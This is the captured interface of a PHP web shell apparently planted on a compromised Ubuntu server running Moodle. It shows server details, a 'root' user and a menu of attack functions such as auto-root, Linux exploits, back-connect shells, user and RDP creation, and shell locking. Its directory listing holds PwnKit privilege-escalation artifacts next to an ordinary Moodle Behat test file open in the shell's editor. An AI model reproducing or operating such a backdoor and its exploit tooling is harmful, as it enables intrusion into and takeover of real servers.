Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
theme /
boost /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
blacklist.json
174
B
-rwxrwxrwx
contextmenu.feature
1.13
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
regionmainsettingsmenu.feature
1.86
KB
-rwxrwxrwx
settingstabs.feature
494
B
-rwxrwxrwx
tour_filter.feature
1.76
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : regionmainsettingsmenu.feature
@javascript @theme_boost Feature: Region main settings menu To navigate in boost theme I need to use the region main settings menu Background: Given the following "courses" exist: | fullname | shortname | newsitems | | Course 1 | C1 | 5 | And the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | 1 | teacher1@example.com | | student1 | Student | 1 | student1@example.com | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | | student1 | C1 | student | And the following "activities" exist: | activity | name | intro | course | idnumber | option | | choice | Choice name | Test choice description | C1 | choice1 | Option 1, Option 2, Option 3 | Scenario: Teacher can use the region main settings menu Given I log in as "teacher1" When I am on "Course 1" course homepage Then "#region-main-settings-menu [role=button]" "css_element" should not exist And I am on the "Choice name" "Choice activity" page And I click on "#region-main-settings-menu [role=button]" "css_element" And I choose "Edit settings" in the open action menu And I should see "Updating: Choice" And I navigate to course participants And I click on "#region-main-settings-menu [role=button]" "css_element" And I choose "Enrolment methods" in the open action menu And I should see "Enrolment methods" Scenario: Student cannot use all options in the region main settings menu Given I log in as "student1" When I am on "Course 1" course homepage Then "#region-main-settings-menu [role=button]" "css_element" should not exist And I am on the "Choice name" "Choice activity" page And "#region-main-settings-menu [role=button]" "css_element" should not exist
Close